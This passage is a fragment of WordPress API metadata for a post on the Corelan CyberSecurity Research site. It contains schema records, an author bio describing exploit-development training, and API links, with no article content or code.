worldwide.","publisher":{"@id":"https:\/\/www.corelan.be\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.corelan.be\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.corelan.be\/#organization","name":"Corelan CyberSecurity Research","url":"https:\/\/www.corelan.be\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/","url":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","contentUrl":"https:\/\/www.corelan.be\/wp-content\/uploads\/2026\/03\/corelanlogo2_small-20.png","width":200,"height":200,"caption":"Corelan CyberSecurity Research"},"image":{"@id":"https:\/\/www.corelan.be\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/corelanconsulting","https:\/\/x.com\/corelanc0d3r","https:\/\/x.com\/corelanconsulting","https:\/\/instagram.com\/corelanconsult"]},{"@type":"Person","@id":"https:\/\/www.corelan.be\/#\/schema\/person\/3be5542b9b0a0787893db83a5ad68e8f","name":"corelanc0d3r","pronouns":"he\/him","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","url":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3783bed6acd72d7fa5bb2387d88acbb9a3403e7cada60b2037e1cbb74ad451f9?s=96&d=mm&r=x","caption":"corelanc0d3r"},"description":"Peter Van Eeckhoutte is the founder of Corelan and a globally recognized expert in exploit development and vulnerability research. 
With over two decades in IT security, he built Corelan into a respected platform for deep technical research, hands-on training, and knowledge sharing. Known for his influential exploit development tutorials, tools, and real-world training, Peter combines a strong research mindset with a passion for education\u2014helping security professionals understand not just how exploits work, but why.","sameAs":["https:\/\/www.corelan-training.com","https:\/\/instagram.com\/corelanc0d3r","https:\/\/www.linkedin.com\/in\/petervaneeckhoutte\/","https:\/\/x.com\/corelanc0d3r"],"url":"https:\/\/www.corelan.be\/index.php\/author\/admin0\/"}]}},"views":101142,"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/2677","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/comments?post=2677"}],"version-history":[{"count":0,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/posts\/2677\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/media?parent=2677"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/categories?post=2677"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.corelan.be\/index.php\/wp-json\/wp\/v2\/tags?post=2677"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}